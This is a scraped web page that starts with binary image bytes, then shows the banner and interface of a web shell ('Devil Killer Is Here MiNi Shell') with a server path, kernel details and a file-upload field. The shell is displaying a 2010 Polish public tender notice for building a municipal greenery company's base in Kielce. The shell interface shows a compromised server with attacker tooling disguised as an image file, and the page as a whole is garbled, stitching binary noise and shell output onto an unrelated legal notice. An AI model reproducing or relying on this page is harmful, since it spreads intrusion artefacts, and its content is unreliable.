JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100802/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100802/234630-N-2010.html

<p class="kh_header"><b>Kielce: Zaprojektowanie i wykonanie bazy Rejonowego Przedsiębiorstwa Zieleni 
Spółka z o.o.  w Kielcach przy ul. Sandomierskiej  dz. nr ewid.444/1 obręb 012</b><br>
<b>Numer ogłoszenia: 234630 - 2010; data zamieszczenia: 02.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rejonowe Przedsiębiorstwo Zieleni Sp. z o.o. , ul. Lecha 11a, 25-622 Kielce, woj. świętokrzyskie, tel. 3452880, faks 3452880.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie i wykonanie bazy Rejonowego Przedsiębiorstwa Zieleni 
Spółka z o.o.  w Kielcach przy ul. Sandomierskiej  dz. nr ewid.444/1 obręb 012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zaprojektowanie i wykonanie bazy Rejonowego Przedsiębiorstwa Zieleni Spółka z o.o. w Kielcach przy ul. Sandomierskiej  dz. nr. ewid. 441/1 obręb 012 wraz z towarzyszącą jej infrastrukturą techniczną.( bez przyłączy
i sieci zewnętrznych)
Inwestycja realizowana w systemie zaprojektuj i wykonaj obiekt
Przewidywane parametry ( +-15%) określające wielkość obiektu:

Budynek:		Długość / szerokość / pow. użytk. / pow. zabudowy/kubatura.

- administracyjno-socjalny		38,0m/25,0m/1616,00 m2/653m2/ok.4270m3
- pawilon handlowy			35,0m/10,0m/627,00m2/358,0m2/ok.1854m3
- szklarnie (2 szt.) z zapleczem 2 x (37,0m/21,0m/1491,00m2/516,0m2/ok.5100m3)
- hala magazynowo-warsztatowa	146,0m/30m/5082,00 m2/2922,4 m2/ok.24 000m3
- magazyn soli (typu wigwam)	średnica ok. 16,00 m / ok. 208,0 m2/ok.600m3

Ogółem powierzchnia zabudowy:		- ok.   5 170 m2
Kubatura łącznie:				- ok. 35824 m3
Drogi i place:				- ok.   8 400 m2
Miejsca parkingowe z kostki ażurowej	- ok.      690 m2


	Wykonanie przedmiotu zamówienia obejmuje:
a) Wykonanie dokumentacji projektowej bazy Rejonowego Przedsiębiorstwa    Zieleni Spółka z o.o. w Kielcach  obejmującej m.in.:
- opracowanie szczegółowej koncepcji architektonicznej i uzgodnienie jej z Zamawiającym;
- opracowanie dokumentacji projektowej (projekt budowlany) zgodnie z wymogami 
   prawa budowlanego w oparciu o rozporządzenie Ministra Infrastruktury z dnia
   03 lipca 2003r. w sprawie szczegółowego zakresu projektu budowlanego
  ( Dz. U. z 2003r., nr 120, poz. 1133,   z póź. zm.), 
- uzyskanie niezbędnych warunków, uzgodnień, opinii, itp., dla potrzeb opracowania 
   projektu budowlanego, 
- uzyskanie stosownego pozwolenia na budowę,
- opracowanie szczegółowych projektów wykonawczych zgodnie z wymogami 
   rozporządzenia Ministra Infrastruktury z dnia 02 września 2004r. w sprawie 
   szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych 
   wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego
   ( Dz. U. z 2004r., nr 202, poz. 2072 z póź. zm. ),
- opracowania specyfikacji technicznej wykonania i odbioru robót budowlanych 
   ( STWiORB), zgodnie z przywołanym wyżej aktem normatywnym z dnia 02.09.2004r.,
- opracowanie  kosztorysów szczegółowych i zbiorczego zestawienia kosztów,    
- opracowanie pozostałej dokumentacji projektowo - technicznej niezbędnej do 
   wykonania  przedmiotu zamówienia  ( np. sieci zewnętrzne, przyłącza, przełożenie 
   sieci , przełożenie lub skablowanie linii napowietrznej średniego napięcia i n.n.,  
   zabezpieczenie istniejącej linii 110kV, kotłownia gazowa ) lub uzyskania stosownych 
  decyzji, uzgodnień, opinii, itp. w imieniu  Zamawiającego oraz  kontroli wykonywania 
  robót. 
Dokumentację należy wykonać w oparciu o  Program funkcjonalno-użytkowy dla bazy Rejonowego Przedsiębiorstwa Zieleni Spółka z o.o. w Kielcach przy ul. Sandomierskiej  dz. nr. ewid. 441/1 obręb 012 oraz decyzję nr 306/2008 o warunkach zabudowy z dnia 04.07.2008r stanowiące integralną część SIWZ jako zał. nr 1 i nr 2.
Program obejmuje swoim zakresem także:
- zestawienie wykończenia i wyposażenia pomieszczeń,
-wstępną opinię Geotechniczną.

b) Wykonanie robót budowlanych na podstawie opracowanej dokumentacji 
      obejmujących m.in.:

	Zakres robót budowlanych:
- przygotowanie terenu pod budowę bazy wraz z przebudową  i budową infrastruktury   
  technicznej dla potrzeb obiektów, rozbiórką budynku mieszkalnego,  
- budowa obiektów bazy,
- zagospodarowanie terenu, 
- pozostałe prace, które będą wynikać z opracowanej dokumentacji projektowej
   dla zapewnienia powyższej funkcji tj m.in.:
- budowie elementów zagospodarowania terenu oraz niezbędnej infrastruktury dla 
  całości zamierzenia inwestycyjnego,
- dla obiektu kubaturowego wykonanie informacji wizualnej zarówno wewnętrznej jak 
   i zewnętrznej,
- budowie elementów układu komunikacyjnego wraz z parkingami,
- wykonanie rozruchu mechanicznego, hydraulicznego i technologicznego 
   wybudowanych obiektów  technologicznych wraz z osiągnięciem żądanych 
   parametrów technologicznych,
 - inne roboty (prace) które będą wynikać z opracowanej szczegółowej dokumentacji   
   projektowej przez wykonawcę lub będą konieczne dla zapewnienia rezultatu dla 
   obiektów bazy RPZ Sp. z o.o. i obiektów z nią związanych.
Wszystkie obiekty winny być wykonane pod klucz tzn. wraz z wyposażeniem.
Zakres robót budowlanych nie obejmuje wykonania sieci i przyłączy do obiektów bazy oraz ich przebudowy. 
Dodatkowo należy zapewnić i wykonać  m.in.:    
- kompleksową obsługę geologiczną i geodezyjną wraz z powykonawczą 
  inwentaryzacją geodezyjną w 3 kpl. wraz z wniesieniem do Państwowego  Zasobu 
  Geodezyjnego i Kartograficznego,
- wykonanie dokumentacji powykonawczej w 3 egz.,
- organizację ruchu i oznakowanie budowy 
- sporządzenie planu bezpieczeństwa i ochrony zdrowia, 
- uzyskanie pozwolenia na zajęcie pasa drogowego i poniesienie opłat z tym 
  związanych, w tym pierwszej rocznej opłaty za umieszczenie urządzeń w pasie 
  drogowym, jeżeli taki przypadek wystąpi, 
- dokonania uzgodnień, uzyskania wszelkich opinii niezbędnych do wykonania 
  przedmiotu zamówienia i przekazania go do użytku i poniesienia opłat z tym 
  związanych.
- urządzenie terenu budowy, wykonania przyłączeń wod.- kan. i energetycznych 
  dla potrzeb budowy oraz poniesienia ich kosztów,
- poniesienia ewentualnych kosztów wyłączeń i włączeń energii elektrycznej dla 
  potrzeb budowy,
- w przypadku zniszczeń lub uszkodzeń obiektów, urządzeń lub ich części w toku 
  realizacji  - naprawienia szkody lub doprowadzenia do stanu pierwotnego,
- przywrócenie do pierwotnego stanu terenu robót z uwzględnieniem zakresu 
  nowopowstałych obiektów budowlanych,
- ponoszenie pełnej odpowiedzialności za dozór mienia na terenie robót, jak i za 
  wszelkie szkody powstałe w trakcie trwania robót na terenie przejętym od 
  Zamawiającego lub mających związek z prowadzonymi robotami w tym za szkody 
  w majątku osób trzecich, ograniczenie praw osób trzecich z tytułu prowadzenia 
  robót itp.,
- ponoszenie pełnej odpowiedzialności za szkody oraz następstwa nieszczęśliwych 
  wypadków pracowników i osób trzecich powstałe w zawiązku z prowadzonymi 
  robotami  w tym także ruchem pojazdów,  
- przeprowadzenie rozruchu technologicznego, zakończonego uzyskaniem 
  wymaganych wartości wskaźników dla przedmiotowego zamówienia, 
- opracowanie instrukcji obsługi wraz z instrukcjami stanowiskowymi,
- przeszkolenie pracowników Użytkownika w zakresie obsługi obiektów wraz 
  ze szkoleniami stanowiskowymi,
- uzyskanie i przedłożenie Zamawiającemu świadectwa energetycznego, zgodnie 
  z wymogami Prawa Budowlanego,
- opracowanie instrukcji bezpieczeństwa pożarowego i wyposażenie obiektów bazy
  w sprzęt p.poż.
- uzyskanie decyzji na użytkowanie bazy,
- pozostałych zadań, prac i robót wymienionych w niniejszej SIWZ i załącznikach lub 
  niezbędnych dla wykonania przedmiotowego zamówienia.

Całość robót zostanie wykonana zgodnie z przepisami BHP oraz Warunkami Technicznymi Wykonania i Odbioru Robót Budowlano-Montażowych. Użyte materiały
 i urządzenia będą zgodne z projektami i zaleceniami Zamawiającego oraz będą posiadać stosowne atesty i dopuszczenia na rynek polski.

Zamawiający nie zalicza niniejszego przedmiotu zamówienia do pojęcia robót 
o powszechnie znanych rozwiązaniach konstrukcyjnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie robót uzupełniających do 30% zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 74.22.20.00-1, 74.22.22.00-2, 74.23.20.00-4, 45.00.00.00-7, 45.23.31.00-2, 45.30.00.00-0, 45.31.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości;  -  200 000 ,00  PLN ( dwieście  tysięcy zł )  należy wnieść przed upływem terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Wykonawca potwierdzi spełnianie warunków udziału w postępowaniu, jeżeli wykaże, że wykonał  co najmniej dwie roboty budowlane w systemie zaprojektuj wybuduj o wartości brutto min. 10 mln zł każda, polegające na budowie budynków  użyteczności publicznej, potwierdzone dokumentami, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy złożyć:
wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności 	odpowiedzialnych za świadczenie, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia oraz informacji o podstawie do dysponowania tymi osobami - Potwierdzeniem spełniania warunku będzie przedstawienie wykazu zawierającego nie mniej niż;

Dysponowanie osobami posiadającymi uprawnienia budowlane bez ograniczeń do kierowania/ nadzorowania robotami i projektowania( wymagane jest 5 letnie doświadczenie liczone od daty uzyskania uprawnień):
a) w specjalności architektonicznej,
b) w specjalności konstrukcyjno - budowlanej do kierowania robotami,
c) w specjalności konstrukcyjno - budowlanej do projektowania,
d) instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, 
    gazowych, wodociągowych i kanalizacyjnych do kierowania robotami,
e) instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, 
   gazowych, wodociągowych i kanalizacyjnych do projektowania,
f) instalacyjnej w zakresie instalacji i urządzeń elektrycznych do kierowania 
   robotami, 
g) instalacyjnej w zakresie instalacji i urządzeń elektrycznych do projektowania,
h) drogowej do kierowania robotami,
 i) drogowej do projektowania,
wpisanych na listę członków właściwej izby samorządu zawodowego wraz 
z aktualnym zaświadczeniem, posiadającymi (każdy z nich) 5 letnie doświadczenie w wykonawstwie( lub nadzorze)oraz  projektowaniu.
Do oferty należy dołączyć oświadczenie Wykonawcy potwierdzające posiadanie wymaganych uprawnień tych  osób oraz przynależność do  właściwej Izby Samorządu Zawodowego</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej posiadanie  minimum 3 mil PLN środków finansowych lub zdolność kredytową w tej samej wysokości wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
W celu potwierdzenia odpowiedniego potencjału ekonomicznego tj. płynności bieżącej nie mniejszej niż 1,0 
               należy załączyć sprawozdanie finansowe albo jego część tj. bilans oraz rachunek zysków i strat, a jeżeli podlega
              ono badaniu  przez biegłego rewidenta, również z opinią odpowiednio o badanym sprawozdaniu, a w przypadku
              Wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego - inne dokumenty określające
              obroty oraz zobowiązania i należności za ostatni rok obrotowy. 
              (Płynność bieżąca w ostatnim roku obrotowym liczona wg wzoru: PB= aktywa bieżące pasywa bieżące, 
              nie mniejsza niż 1,0 gdzie PB oznacza płynność bieżącą)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 1 rok obrotowy</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do podpisania oferty, oświadczeń i dokumentów składających się na ofertę, o ile pełnomocnictwo to nie wynika z innych dokumentów dołączonych do oferty - pełnomocnictwo należy przedstawić w formie oryginału, podpisane przez Wykonawcę lub w formie kserokopii poświadczonej za zgodność z oryginałem przez notariusza. 
Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej w celu potwierdzenia umocowania osób do udzielenia pełnomocnictwa lub składania oświadczeń woli.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Terminy ustalone w §5 umowy ulegną przesunięciu w przypadku wystąpienia opóźnień wynikających z:
a) przestojów i opóźnień zawinionych przez Zamawiającego,
b) działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne, pożary), mającego bezpośredni wpływ na terminowość wykonywania robót,
c) wystąpienia okoliczności, których Strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności np.:
- wykopaliska archeologiczne itp uniemożliwiające wykonywanie robót.
- w następstwie, wykraczających poza terminy określone w KPA, procedur administracyjnych oraz innych terminów formalno - prawnych mających wpływ na termin realizacji umowy, 
- zmiany (zwiększenia) zakresu robót przez Zamawiającego. 
- pisemnego żądania wstrzymania prac skierowanego do Wykonawcy przez Zamawiającego lub wydania zakazu prowadzenia prac przez organ administracji publicznej, o ile żądanie lub wydanie zakazów nie nastąpiło z przyczyn, za które Wykonawca ponosi odpowiedzialność,
- zmiany przez Zamawiającego harmonogramu rzeczowo-finansowego realizacji budowy, 

W przedstawionych w § 8 umowy przypadkach wystąpienia opóźnień, strony ustalą nowe terminy, z tym, że maksymalny okres przesunięcia terminu zakończenia realizacji przedmiotu umowy równy będzie okresowi przerwy lub postoju. Zmiany terminu wymagają aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zielen.kielce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> REJONOWE PRZEDSIĘBIORSTWO ZIELENI Sp. z o.o.
Ul Lecha 11 a 
25-622 Kielce.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.08.2010 godzina 10:00, miejsce: REJONOWE PRZEDSIĘBIORSTWO ZIELENI Sp. z o.o.
Ul Lecha 11 a 
25-622 Kielce
pokój nr 13  (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

